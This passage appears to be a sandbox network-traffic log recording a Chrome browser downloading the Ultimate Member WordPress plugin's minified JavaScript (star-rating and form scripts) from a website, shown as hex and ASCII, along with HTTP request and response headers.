                                                                                                                                                                                                                                                                        Data Ascii: 238f!function(i){var r={init:function(t){return this.each(function(){this.self=i(this),r.destroy.call(this.self),this.opt=i.extend(!0,{},i.fn.um_raty.defaults,t),r._adjustCallback.call(this),r._adjustNumber.call(this),"img"!==this.opt.starType&&r._adjus
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 6f 70 74 2e 6e 75 6d 62 65 72 2c 31 2c 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 4d 61 78 29 7d 2c 5f 61 64 6a 75 73 74 50 61 74 68 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 3d 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 7c 7c 22 22 2c 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 26 26 22 2f 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2e 63 68 61 72 41 74 28 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2e 6c 65 6e 67 74 68 2d 31 29 26 26 28 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2b 3d 22 2f 22 29 7d 2c 5f 61 64 6a 75 73 74 50 72 65 63 69 73 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 70 74 2e 68 61 6c 66 3d 21 30 2c 74 68 69 73 2e 6f 70 74 2e 74 61 72 67 65 74 54 79 70 65 3d 22 73 63 6f 72 65 22 7d 2c 5f 61 64
                                                                                                                                                                                                                                                                        Data Ascii: opt.number,1,this.opt.numberMax)},_adjustPath:function(){this.opt.path=this.opt.path||"",this.opt.path&&"/"!==this.opt.path.charAt(this.opt.path.length-1)&&(this.opt.path+="/")},_adjustPrecision:function(){this.opt.half=!0,this.opt.targetType="score"},_ad
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 28 61 2c 65 2c 74 29 7d 29 7d 2c 5f 62 69 6e 64 4f 75 74 43 61 6e 63 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 3b 61 2e 63 61 6e 63 65 6c 2e 6f 6e 28 22 6d 6f 75 73 65 6c 65 61 76 65 2e 75 6d 5f 72 61 74 79 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 61 2e 6f 70 74 2e 63 61 6e 63 65 6c 4f 66 66 3b 22 69 6d 67 22 21 3d 3d 61 2e 6f 70 74 2e 73 74 61 72 54 79 70 65 26 26 28 65 3d 61 2e 6f 70 74 2e 63 61 6e 63 65 6c 43 6c 61 73 73 2b 22 20 22 2b 65 29 2c 72 2e 5f 73 65 74 49 63 6f 6e 2e 63 61 6c 6c 28 61 2c 74 68 69 73 2c 65 29 2c 61 2e 6f 70 74 2e 6d 6f 75 73 65 6f 75 74 26 26 28 65 3d 2b 61 2e 73 63 6f 72 65 2e 76 61 6c 28 29 7c 7c 76 6f 69 64 20 30 2c 61 2e 6f 70 74 2e 6d 6f 75 73 65 6f 75 74 2e 63 61 6c 6c 28
                                                                                                                                                                                                                                                                        Data Ascii: (a,e,t)})},_bindOutCancel:function(){var a=this;a.cancel.on("mouseleave.um_raty",function(t){var e=a.opt.cancelOff;"img"!==a.opt.starType&&(e=a.opt.cancelClass+" "+e),r._setIcon.call(a,this,e),a.opt.mouseout&&(e=+a.score.val()||void 0,a.opt.mouseout.call(
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 2e 6f 70 74 2e 74 61 72 67 65 74 53 63 6f 72 65 29 3b 74 68 69 73 2e 73 63 6f 72 65 3d 74 2e 6c 65 6e 67 74 68 3f 74 3a 72 2e 5f 62 75 69 6c 64 53 63 6f 72 65 46 69 65 6c 64 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 5f 63 72 65 61 74 65 53 74 61 72 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 3d 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 3b 74 2b 2b 29 7b 76 61 72 20 65 3d 72 2e 5f 6e 61 6d 65 46 6f 72 49 6e 64 65 78 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 2c 65 3d 7b 61 6c 74 3a 74 2c 73 72 63 3a 74 68 69 73 2e 6f 70 74 2e 70 61 74 68 2b 74 68 69 73 2e 6f 70 74 5b 65 5d 7d 3b 28 65 3d 22 69 6d 67 22 21 3d 3d 74 68 69 73 2e 6f 70 74 2e 73 74 61
                                                                                                                                                                                                                                                                        Data Ascii: re:function(){var t=i(this.opt.targetScore);this.score=t.length?t:r._buildScoreField.call(this)},_createStars:function(){for(var t=1;t<=this.opt.number;t++){var e=r._nameForIndex.call(this,t),e={alt:t,src:this.opt.path+this.opt[e]};(e="img"!==this.opt.sta
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 29 2c 74 7d 2c 5f 74 75 72 6e 4f 6e 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 2e 73 69 6e 67 6c 65 3f 74 3d 3d 3d 65 3a 74 3c 3d 65 7d 2c 5f 67 65 74 48 69 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 6f 70 74 2e 68 69 6e 74 73 5b 74 2d 31 5d 3b 72 65 74 75 72 6e 22 22 3d 3d 3d 65 3f 22 22 3a 65 7c 7c 74 7d 2c 5f 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 70 61 72 73 65 49 6e 74 28 74 68 69 73 2e 73 63 6f 72 65 2e 76 61 6c 28 29 2c 31 30 29 2c 74 3d 74 3f 72 2e 5f 67 65 74 48 69 6e 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 29 3a 74 68 69 73 2e 6f 70 74 2e 6e 6f 52 61 74 65 64 4d 73 67 3b 74 68 69 73 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 22 22 2c 74 68
                                                                                                                                                                                                                                                                        Data Ascii: ),t},_turnOn:function(t,e){return this.opt.single?t===e:t<=e},_getHint:function(t){var e=this.opt.hints[t-1];return""===e?"":e||t},_lock:function(){var t=parseInt(this.score.val(),10),t=t?r._getHint.call(this,t):this.opt.noRatedMsg;this.style.cursor="",th
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 5f 73 65 74 54 61 72 67 65 74 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2c 74 29 29 7d 2c 5f 75 6e 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 73 74 79 6c 65 2e 63 75 72 73 6f 72 3d 22 70 6f 69 6e 74 65 72 22 2c 74 68 69 73 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 29 2c 74 68 69 73 2e 73 63 6f 72 65 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 72 65 61 64 6f 6e 6c 79 22 29 2c 74 68 69 73 2e 73 65 6c 66 2e 64 61 74 61 28 22 72 65 61 64 6f 6e 6c 79 22 2c 21 31 29 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 74 68 69 73 2e 6f 70 74 2e 6e 75 6d 62 65 72 3b 74 2b 2b 29 74 68 69 73 2e 73 74 61 72 73 5b 74 5d 2e 74 69 74 6c 65 3d 72 2e 5f 67 65 74 48 69 6e 74 2e 63 61 6c 6c 28 74 68 69 73 2c 74 2b 31 29 3b 74 68 69 73 2e 63
                                                                                                                                                                                                                                                                        Data Ascii: _setTarget.call(this,a,t))},_unlock:function(){this.style.cursor="pointer",this.removeAttribute("title"),this.score.removeAttr("readonly"),this.self.data("readonly",!1);for(var t=0;t<this.opt.number;t++)this.stars[t].title=r._getHint.call(this,t+1);this.c
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 22 29 2c 72 2e 5f 6c 6f 63 6b 29 3a 28 72 2e 5f 62 69 6e 64 73 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 5f 75 6e 6c 6f 63 6b 29 29 2e 63 61 6c 6c 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 22 72 65 61 64 6f 6e 6c 79 22 2c 65 29 29 7d 29 7d 2c 72 65 6c 6f 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 73 65 74 2e 63 61 6c 6c 28 74 68 69 73 2c 7b 7d 29 7d 2c 73 63 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 69 28 74 68 69 73 29 3b 72 65 74 75 72 6e 20 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3f 72 2e 73 65 74 53 63 6f 72 65 2e 61 70 70 6c 79 28 74 2c 61 72 67 75 6d 65 6e 74 73 29 3a 72 2e 67 65 74 53 63 6f 72 65 2e 63 61 6c 6c 28 74 29 7d 2c 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                                        Data Ascii: "),r._lock):(r._binds.call(this),r._unlock)).call(this),t.data("readonly",e))})},reload:function(){return r.set.call(this,{})},score:function(){var t=i(this);return arguments.length?r.setScore.apply(t,arguments):r.getScore.call(t)},set:function(a){return
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC20INData Raw: 3a 22 68 69 6e 74 22 7d 7d 28 6a 51 75 65 72 79 29 3b 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: :"hint"}}(jQuery);
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        95192.168.2.449853141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC581OUTGET /wp-content/plugins/ultimate-member/assets/js/um-scripts.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
                                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 15 Nov 2024 17:23:51 GMT
                                                                                                                                                                                                                                                                        ETag: W/"673783a7-2fcd"
                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                        Age: 147814
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 8f4fba0c1e420f83-EWR
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC877INData Raw: 32 66 63 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 73 61 6e 69 74 69 7a 65 5f 76 61 6c 75 65 28 65 2c 74 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 2c 65 3d 28 61 2e 69 6e 6e 65 72 54 65 78 74 3d 65 2c 61 2e 69 6e 6e 65 72 48 54 4d 4c 29 3b 72 65 74 75 72 6e 20 74 26 26 6a 51 75 65 72 79 28 74 29 2e 76 61 6c 28 65 29 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 75 6d 5f 75 6e 73 61 6e 69 74 69 7a 65 5f 76 61 6c 75 65 28 65 29 7b 76 61 72 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 3b 72 65 74 75 72 6e 20 74 2e 69 6e 6e 65 72 48 54 4d 4c 3d 65 2c 30 3d 3d 3d 74 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3f 22 22 3a 74
                                                                                                                                                                                                                                                                        Data Ascii: 2fcdfunction um_sanitize_value(e,t){var a=document.createElement("div"),e=(a.innerText=e,a.innerHTML);return t&&jQuery(t).val(e),e}function um_unsanitize_value(e){var t=document.createElement("textarea");return t.innerHTML=e,0===t.childNodes.length?"":t
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 63 68 69 6c 64 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 61 74 61 2d 70 61 72 65 6e 74 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 74 29 2e 66 69 6e 64 28 65 29 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 55 4d 2e 64 72 6f 70 64 6f 77 6e 2e 68 69 64 65 41 6c 6c 28 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 22 2e 75 6d 2d 73 31 2c 2e 75 6d 2d 73 32 22 29 2e 63 73 73 28 7b 64 69 73 70 6c 61 79 3a 22 62 6c 6f 63 6b 22 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 66 6e 2e 73 65 6c 65 63 74 32 26 26 28 6a 51 75
                                                                                                                                                                                                                                                                        Data Ascii: unction(){var e=jQuery(this).attr("data-child"),t=jQuery(this).attr("data-parent");return jQuery(this).parents(t).find(e).trigger("click"),UM.dropdown.hideAll(),!1}),jQuery(".um-s1,.um-s2").css({display:"block"}),"function"==typeof jQuery.fn.select2&&(jQu
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 79 3a 21 30 7d 29 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 68 61 6e 67 65 22 2c 27 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 6c 61 62 65 6c 22 29 3b 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 61 63 74 69 76 65 22 29 2c 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 72 61 64 69 6f 22 29 2e 66 69 6e 64 28 22 69 22 29 2e 72 65 6d 6f 76 65 41 74 74
                                                                                                                                                                                                                                                                        Data Ascii: y:!0})),jQuery(document).on("change",'.um-field-area input[type="radio"]',function(){var e=jQuery(this).parents(".um-field-area"),t=jQuery(this).parents("label");e.find(".um-field-radio").removeClass("active"),e.find(".um-field-radio").find("i").removeAtt
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 6f 77 28 29 2c 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 6d 6f 64 61 6c 2d 62 74 6e 2e 75 6d 2d 66 69 6e 69 73 68 2d 75 70 6c 6f 61 64 22 29 2e 61 64 64 43 6c 61 73 73 28 22 64 69 73 61 62 6c 65 64 22 29 2c 75 6d 5f 6d 6f 64 61 6c 5f 72 65 73 70 6f 6e 73 69 76 65 28 29 7d 7d 29 3a 28 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 22 29 2c 6e 3d 61 2e 64 61 74 61 28 22 6d 6f 64 65 22 29 2c 69 3d 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 20 69 6d 67 22 29 2e 61 74 74 72 28 22 73 72 63 22 29 2c 65 3d 61 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 23 27 2b 61 2e 64 61 74 61 28 22 6b 65 79 22 29 2b 22 2d 22 2b 6a 51 75 65 72
                                                                                                                                                                                                                                                                        Data Ascii: ow(),a.find(".um-modal-btn.um-finish-upload").addClass("disabled"),um_modal_responsive()}}):(a=jQuery(this).parents(".um-field"),n=a.data("mode"),i=a.find(".um-single-image-preview img").attr("src"),e=a.find('input[type="hidden"]#'+a.data("key")+"-"+jQuer
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 69 3d 61 2e 66 69 6e 64 28 22 2e 75 6d 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 69 6e 66 6f 20 61 22 29 2e 61 74 74 72 28 22 68 72 65 66 22 29 2c 6e 3d 61 2e 64 61 74 61 28 22 6d 6f 64 65 22 29 2c 65 3d 61 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 23 27 2b 61 2e 64 61 74 61 28 22 6b 65 79 22 29 2b 22 2d 22 2b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 66 6f 72 6d 22 29 2e 66 69 6e 64 28 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 68 69 64 64 65 6e 22 5d 5b 6e 61 6d 65 3d 22 66 6f 72 6d 5f 69 64 22 5d 27 29 2e 76 61 6c 28 29 29 2e 76 61 6c 28 29 2c 72 3d 7b 64 61 74 61 3a 7b 6d 6f 64 65 3a 6e 2c 66 69 6c 65 6e 61 6d 65 3a 65 2c 73 72 63 3a 69 2c 6e 6f 6e 63 65 3a 75 6d 5f 73 63 72 69 70 74 73 2e 6e 6f 6e
                                                                                                                                                                                                                                                                        Data Ascii: i=a.find(".um-single-fileinfo a").attr("href"),n=a.data("mode"),e=a.find('input[type="hidden"]#'+a.data("key")+"-"+jQuery(this).parents("form").find('input[type="hidden"][name="form_id"]').val()).val(),r={data:{mode:n,filename:e,src:i,nonce:um_scripts.non
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 65 6e 67 74 68 3f 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 72 65 6d 6f 76 65 28 29 3a 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 68 69 64 65 28 29 2c 30 3c 74 26 26 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 62 6f 64 79 22 29 2e 6c 65 6e 67 74 68 3c 74 26 26 65 2e 66 69 6e 64 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 67 72 6f 75 70 2d 68 65 61 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 64 69 73 61 62 6c 65 64 22 29 2c 21 31 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d
                                                                                                                                                                                                                                                                        Data Ascii: ength?jQuery(this).parents(".um-field-group-body").remove():jQuery(this).parents(".um-field-group-body").hide(),0<t&&e.find(".um-field-group-body").length<t&&e.find(".um-field-group-head").removeClass("disabled"),!1}),jQuery(document.body).on("click",".um
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 68 6f 6f 6b 22 29 2c 74 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 75 73 65 72 5f 69 64 22 29 2c 61 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 61 72 67 73 22 29 3b 72 65 74 75 72 6e 20 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 73 2d 72 65 6d 6f 76 65 22 29 26 26 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 2e 22 2b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 64 61 74 61 28 22 6a 73 2d 72 65 6d 6f 76 65 22 29 29 2e 66 61 64 65 4f 75 74 28 22 66 61 73 74 22 29 2c 6a 51 75 65 72 79 2e 61 6a 61 78 28 7b 75 72 6c 3a 77 70 2e 61 6a 61
                                                                                                                                                                                                                                                                        Data Ascii: nction(e){e.preventDefault();var e=jQuery(this).data("hook"),t=jQuery(this).data("user_id"),a=jQuery(this).data("args");return jQuery(this).data("js-remove")&&jQuery(this).parents("."+jQuery(this).data("js-remove")).fadeOut("fast"),jQuery.ajax({url:wp.aja
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 6e 65 28 22 63 6c 69 63 6b 22 2c 27 2e 75 6d 3a 6e 6f 74 28 2e 75 6d 2d 61 63 63 6f 75 6e 74 29 20 2e 75 6d 2d 66 6f 72 6d 20 69 6e 70 75 74 5b 63 6c 61 73 73 3d 22 75 6d 2d 62 75 74 74 6f 6e 22 5d 5b 74 79 70 65 3d 22 73 75 62 6d 69 74 22 5d 3a 6e 6f 74 28 2e 75 6d 2d 68 61 73 2d 72 65 63 61 70 74 63 68 61 29 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 22 64 69 73 61 62 6c 65 64 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 70 61 72 65 6e 74 73 28 22 66 6f 72 6d 22 29 2e 74 72 69 67 67 65 72 28 22 73 75 62 6d 69 74 22 29 7d 29 3b 76 61 72 20 6f 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 64 28 74 2c 65 2c 61 29 7b 76 61 72 20 6e 2c 69 2c 72 3d 74 2e 70 61 72 65 6e 74 73 28 22
                                                                                                                                                                                                                                                                        Data Ascii: ne("click",'.um:not(.um-account) .um-form input[class="um-button"][type="submit"]:not(.um-has-recaptcha)',function(){jQuery(this).attr("disabled","disabled"),jQuery(this).parents("form").trigger("submit")});var o={};function d(t,e,a){var n,i,r=t.parents("
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC1369INData Raw: 28 72 29 29 2c 75 6d 5f 63 68 61 6e 67 65 5f 74 61 67 28 72 29 29 2c 22 79 65 73 22 21 3d 3d 65 2e 70 6f 73 74 2e 6d 65 6d 62 65 72 73 5f 64 69 72 65 63 74 6f 72 79 26 26 28 76 6f 69 64 20 30 3d 3d 3d 65 2e 66 69 65 6c 64 2e 64 65 66 61 75 6c 74 7c 7c 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 3f 22 22 21 3d 3d 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 26 26 74 2e 76 61 6c 28 74 2e 64 61 74 61 28 22 75 6d 2d 6f 72 69 67 69 6e 61 6c 2d 76 61 6c 75 65 22 29 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 3a 74 2e 76 61 6c 28 65 2e 66 69 65 6c 64 2e 64 65 66 61 75 6c 74 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 2c 30 3d 3d 65 2e 66 69 65 6c 64 2e 65 64 69 74
                                                                                                                                                                                                                                                                        Data Ascii: (r)),um_change_tag(r)),"yes"!==e.post.members_directory&&(void 0===e.field.default||t.data("um-original-value")?""!==t.data("um-original-value")&&t.val(t.data("um-original-value")).trigger("change"):t.val(e.field.default).trigger("change"),0==e.field.edit
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC416INData Raw: 76 6f 69 64 20 30 3d 3d 3d 74 26 26 22 22 21 3d 3d 74 7c 7c 28 69 2e 66 69 6e 64 28 27 6f 70 74 69 6f 6e 5b 76 61 6c 75 65 21 3d 22 22 5d 27 29 2e 72 65 6d 6f 76 65 28 29 2c 69 2e 76 61 6c 28 22 22 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 29 7d 29 2c 6a 51 75 65 72 79 28 27 73 65 6c 65 63 74 5b 6e 61 6d 65 3d 22 27 2b 72 2b 27 22 5d 27 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 29 2c 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 75 6d 2d 74 6f 67 67 6c 65 2d 70 61 73 73 77 6f 72 64 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 6a 51 75 65 72 79 28 74 68 69 73 29 2e 63 6c 6f 73 65 73 74 28 22 2e 75 6d 2d 66 69 65 6c 64 2d 61 72 65 61 2d 70 61 73 73 77 6f
                                                                                                                                                                                                                                                                        Data Ascii: void 0===t&&""!==t||(i.find('option[value!=""]').remove(),i.val("").trigger("change"))}),jQuery('select[name="'+r+'"]').trigger("change")}),jQuery(document.body).on("click",".um-toggle-password",function(){var e=jQuery(this).closest(".um-field-area-passwo


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                        96192.168.2.449854141.193.213.114435808C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC581OUTGET /wp-content/plugins/ultimate-member/assets/js/um-profile.min.js?ver=2.9.1 HTTP/1.1
                                                                                                                                                                                                                                                                        Host: alphaarchitect.com
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                        Cookie: __cf_bm=oaZHLCCX_5HyyCRj6hqzB4N2tkR7Es2q56thNCJY11g-1734698678-1.0.1.1-NyEi2UfzCQmWt3PM0KFzSa3bC5QYScS.bxwPSWdPnZmO6XiISm8kmG52t7iL9fVSeIqHftu3Z3ifTzGE2VxBlg
                                                                                                                                                                                                                                                                        2024-12-20 12:44:57 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 20 Dec 2024 12:44:57 GMT
